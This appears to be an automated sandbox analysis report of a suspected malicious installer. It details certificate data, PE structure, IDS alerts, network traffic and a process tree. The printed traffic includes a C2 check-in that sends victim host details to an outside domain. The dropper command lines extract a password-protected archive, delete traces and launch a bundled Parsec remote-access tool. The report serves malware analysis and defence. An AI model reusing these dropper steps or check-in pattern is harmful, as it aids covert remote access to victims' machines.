                            Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                            Error Number:-2146762495
                            Not Before, Not After
                            • 29/08/2024 02:06:14 28/08/2025 20:23:48
                            Subject Chain
                            • OID.1.3.6.1.4.1.311.60.2.1.3=KE, OID.2.5.4.15=Private Organization, CN=KEMROSE ENTERPRISES LTD, SERIALNUMBER=CPR/2010/34857, O=KEMROSE ENTERPRISES LTD, L=Nairobi, S=Nairobi, C=KE
                            Version:3
                            Thumbprint MD5:6E17F82AC2A84546205F6D343FA436A5
                            Thumbprint SHA-1:E1AA448D29371254654C29C65A5309686ACD93D0
                            Thumbprint SHA-256:A89FF2FD4D4690D199C5DAC33F5EF7D9DBB10069213FD2A60389870CE960CF27
                            Serial:1BF8761F7761C3FDB27BF20B88C21357

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004B14B8h
                            call 00007F2AD05CB935h
                            xor eax, eax
                            push ebp
                            push 004B65E2h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004B659Eh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004BE634h]
                            call 00007F2AD066E427h
                            call 00007F2AD066DF7Ah
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F2AD05E13D4h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004C1D84h
                            call 00007F2AD05C6527h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004C1D84h]
                            mov dl, 01h
                            mov eax, dword ptr [004238ECh]
                            call 00007F2AD05E2557h
                            mov dword ptr [004C1D88h], eax
                            xor edx, edx
                            push ebp
                            push 004B654Ah
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F2AD066E4AFh
                            mov dword ptr [004C1D90h], eax
                            mov eax, dword ptr [004C1D90h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F2AD06746CAh
                            mov eax, dword ptr [004C1D90h]
                            mov edx, 00000028h
                            call 00007F2AD05E2E4Ch
                            mov edx, dword ptr [004C1D90h]

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xfdc.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x1e5a0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x30269380xec0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xc22f40x254.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xb39e40xb3a0043af0a9476ca224d8e8461f1e22c94daFalse0.34525867693110646data6.357635049994181IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext0xb50000x16880x1800185e04b9a1f554e31f7f848515dc890cFalse0.54443359375data5.971425428435973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0xb70000x37a40x3800cab2107c933b696aa5cf0cc6c3fd3980False0.36097935267857145data5.048648594372454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0xbb0000x6de80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xc20000xfdc0x1000e7d1635e2624b124cfdce6c360ac21cdFalse0.3798828125data5.029087481102678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata0xc30000x1a40x2008ced971d8a7705c98b173e255d8c9aa7False0.345703125data2.7509822285969876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata0xc40000x9a0x2008d4e1e508031afe235bf121c80fd7d5fFalse0.2578125data1.877162954504408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls0xc50000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0xc60000x5d0x2008f2f090acd9622c88a6a852e72f94e96False0.189453125data1.3838943752217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0xc70000x1e5a00x1e6000ccf407773fbfa810622326e22620cbbFalse0.18008134002057613data3.5767248033948214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xc75580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.4441489361702128
                            RT_ICON0xc79c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.294672131147541
                            RT_ICON0xc83480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.21411819887429642
                            RT_ICON0xc93f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.13838174273858922
                            RT_ICON0xcb9980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.1069910250354275
                            RT_ICON0xcfbc00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.05820418786229741
                            RT_ICON0xe03e80x21f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9807979763136714
                            RT_STRING0xe25e40x360data0.34375
                            RT_STRING0xe29440x260data0.3256578947368421
                            RT_STRING0xe2ba40x45cdata0.4068100358422939
                            RT_STRING0xe30000x40cdata0.3754826254826255
                            RT_STRING0xe340c0x2d4data0.39226519337016574
                            RT_STRING0xe36e00xb8data0.6467391304347826
                            RT_STRING0xe37980x9cdata0.6410256410256411
                            RT_STRING0xe38340x374data0.4230769230769231
                            RT_STRING0xe3ba80x398data0.3358695652173913
                            RT_STRING0xe3f400x368data0.3795871559633027
                            RT_STRING0xe42a80x2a4data0.4275147928994083
                            RT_RCDATA0xe454c0x10data1.5
                            RT_RCDATA0xe455c0x2c4data0.6384180790960452
                            RT_RCDATA0xe48200x2cdata1.1818181818181819
                            RT_GROUP_ICON0xe484c0x68dataEnglishUnited States0.7884615384615384
                            RT_VERSION0xe48b40x584dataEnglishUnited States0.26203966005665724
                            RT_MANIFEST0xe4e380x765XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39091389329107235

                            Imports

                            DLLImport
                            kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dllInitCommonControls
                            version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                            advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

                            Exports

                            NameOrdinalAddress
                            TMethodImplementationIntercept30x4541a8
                            __dbk_fcall_wrapper20x40d0a0
                            dbkFCallWrapperAddr10x4be63c

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-14T02:58:18.030414+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970734.160.111.145443TCP
                            2024-11-14T02:58:19.166828+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708188.114.96.3443TCP
                            2024-11-14T02:58:19.902542+01002051091ET MALWARE Unknown Malvertising Payload CnC Checkin (PSecWin)1192.168.2.549708188.114.96.3443TCP
                            2024-11-14T02:58:22.700068+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549709TCP
                            2024-11-14T02:59:01.302200+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549912TCP
                            2024-11-14T02:59:04.548903+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549940104.18.0.181443TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 14, 2024 02:58:17.410495043 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:17.410583019 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:17.410686016 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:17.411623001 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:17.411653996 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.030296087 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.030414104 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:18.035764933 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:18.035798073 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.036176920 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.084094048 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:18.131340027 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.227878094 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.228626966 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.228758097 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:18.236145020 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:18.236145020 CET49707443192.168.2.534.160.111.145
                            Nov 14, 2024 02:58:18.236179113 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.236196995 CET4434970734.160.111.145192.168.2.5
                            Nov 14, 2024 02:58:18.292095900 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:18.292145014 CET44349708188.114.96.3192.168.2.5
                            Nov 14, 2024 02:58:18.292241096 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:18.292679071 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:18.292695045 CET44349708188.114.96.3192.168.2.5
                            Nov 14, 2024 02:58:19.166558027 CET44349708188.114.96.3192.168.2.5
                            Nov 14, 2024 02:58:19.166827917 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:19.170890093 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:19.170943022 CET44349708188.114.96.3192.168.2.5
                            Nov 14, 2024 02:58:19.171520948 CET44349708188.114.96.3192.168.2.5
                            Nov 14, 2024 02:58:19.172811031 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:19.172811031 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:19.173105955 CET44349708188.114.96.3192.168.2.5
                            Nov 14, 2024 02:58:19.902570009 CET44349708188.114.96.3192.168.2.5
                            Nov 14, 2024 02:58:19.902652025 CET44349708188.114.96.3192.168.2.5
                            Nov 14, 2024 02:58:19.902714014 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:20.021538019 CET49708443192.168.2.5188.114.96.3
                            Nov 14, 2024 02:58:20.021574020 CET44349708188.114.96.3192.168.2.5

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 14, 2024 02:58:17.399267912 CET5517653192.168.2.51.1.1.1
                            Nov 14, 2024 02:58:17.406054974 CET53551761.1.1.1192.168.2.5
                            Nov 14, 2024 02:58:18.257282972 CET6177053192.168.2.51.1.1.1
                            Nov 14, 2024 02:58:18.291127920 CET53617701.1.1.1192.168.2.5

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 14, 2024 02:58:17.399267912 CET192.168.2.51.1.1.10x9f22Standard query (0)ifconfig.meA (IP address)IN (0x0001)false
                            Nov 14, 2024 02:58:18.257282972 CET192.168.2.51.1.1.10xabe6Standard query (0)beautifullyuncluttered.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 14, 2024 02:58:17.406054974 CET1.1.1.1192.168.2.50x9f22No error (0)ifconfig.me34.160.111.145A (IP address)IN (0x0001)false
                            Nov 14, 2024 02:58:18.291127920 CET1.1.1.1192.168.2.50xabe6No error (0)beautifullyuncluttered.com188.114.96.3A (IP address)IN (0x0001)false
                            Nov 14, 2024 02:58:18.291127920 CET1.1.1.1192.168.2.50xabe6No error (0)beautifullyuncluttered.com188.114.97.3A (IP address)IN (0x0001)false
                            Nov 14, 2024 02:58:21.288808107 CET1.1.1.1192.168.2.50x164bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 02:58:21.288808107 CET1.1.1.1192.168.2.50x164bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Nov 14, 2024 02:58:52.302520037 CET1.1.1.1192.168.2.50xabb1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 02:58:52.302520037 CET1.1.1.1192.168.2.50xabb1No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Nov 14, 2024 02:58:52.325397968 CET1.1.1.1192.168.2.50x65d2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 02:58:52.325397968 CET1.1.1.1192.168.2.50x65d2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • ifconfig.me
                            • beautifullyuncluttered.com

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.54970734.160.111.1454435600C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            TimestampBytes transferredDirectionData
                            2024-11-14 01:58:18 UTC196OUTGET /ip HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: ifconfig.me
                            2024-11-14 01:58:18 UTC227INHTTP/1.1 200 OK
                            date: Thu, 14 Nov 2024 01:58:17 GMT
                            content-type: text/plain
                            Content-Length: 14
                            access-control-allow-origin: *
                            via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
                            2024-11-14 01:58:18 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                            Data Ascii: 173.254.250.91


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.549708188.114.96.34435600C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            TimestampBytes transferredDirectionData
                            2024-11-14 01:58:19 UTC255OUTPOST /?CheckApp HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Content-Length: 158
                            Host: beautifullyuncluttered.com
                            2024-11-14 01:58:19 UTC158OUTData Raw: 66 61 30 37 33 64 62 39 36 31 63 64 33 36 34 63 31 66 30 61 64 62 35 63 35 32 66 62 33 64 66 39 0d 0a 31 30 2e 30 30 2e 31 39 30 34 35 0d 0a 59 65 73 0d 0a 59 65 73 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 44 65 66 65 6e 64 65 72 20 41 6e 74 69 76 69 72 75 73 0d 0a 35 30 36 34 30 37 0d 0a 61 6c 66 6f 6e 73 0d 0a 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 50 53 65 63 57 69 6e 0d 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                            Data Ascii: fa073db961cd364c1f0adb5c52fb3df910.00.19045YesYesMicrosoft Defender Antivirus506407userC:\Users\user\AppData\Roaming\PSecWin173.254.250.91
                            2024-11-14 01:58:19 UTC814INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 01:58:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Access-Control-Allow-Origin: *
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lzgvn2ynsfq4CW6StCGH5zckAzE1bjVhr0frvOUcl0DJo3sIBB3aNlBo%2B%2B1J4q7FNoFPYlDQZfaRtzZYHzh0yljdVpq04AAZSOC%2FyX2MMtVawFgosSJEfLkNQ7pWAwrjRPzDQEW%2B4m0HMA5wKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8e23655268fcbd77-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=111587&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2868&recv_bytes=1049&delivery_rate=25951&cwnd=32&unsent_bytes=0&cid=dbfc02e15124099b&ts=756&x=0"
                            2024-11-14 01:58:19 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:20:58:02
                            Start date:13/11/2024
                            Path:C:\Users\user\Desktop\uu8v4UUzTU.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\uu8v4UUzTU.exe"
                            Imagebase:0x400000
                            File size:50'493'432 bytes
                            MD5 hash:2D2F050E6C898065032CB2686A0EFFCA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:20:58:03
                            Start date:13/11/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp" /SL5="$1043C,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
                            Imagebase:0x400000
                            File size:3'220'480 bytes
                            MD5 hash:828B7D7624C14BE1F3D8122F6E2FAC53
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:4
                            Start time:20:58:19
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:20:58:19
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:20:58:19
                            Start date:13/11/2024
                            Path:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
                            Imagebase:0xf70000
                            File size:557'056 bytes
                            MD5 hash:9A1DD1D96481D61934DCC2D568971D06
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:7
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"CMD" /C del "SoundNight.7z"
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:12
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:13
                            Start time:20:58:20
                            Start date:13/11/2024
                            Path:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            Imagebase:0x400000
                            File size:4'056'240 bytes
                            MD5 hash:01EF58E7C144C701B2EA01CFC049DBE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:14
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:15
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" control Parsec 200
                            Imagebase:0x7ff6068e0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\taskkill.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
                            Imagebase:0x700000
                            File size:74'240 bytes
                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                            Has elevated privileges:true
                            Has administrator privileges:true
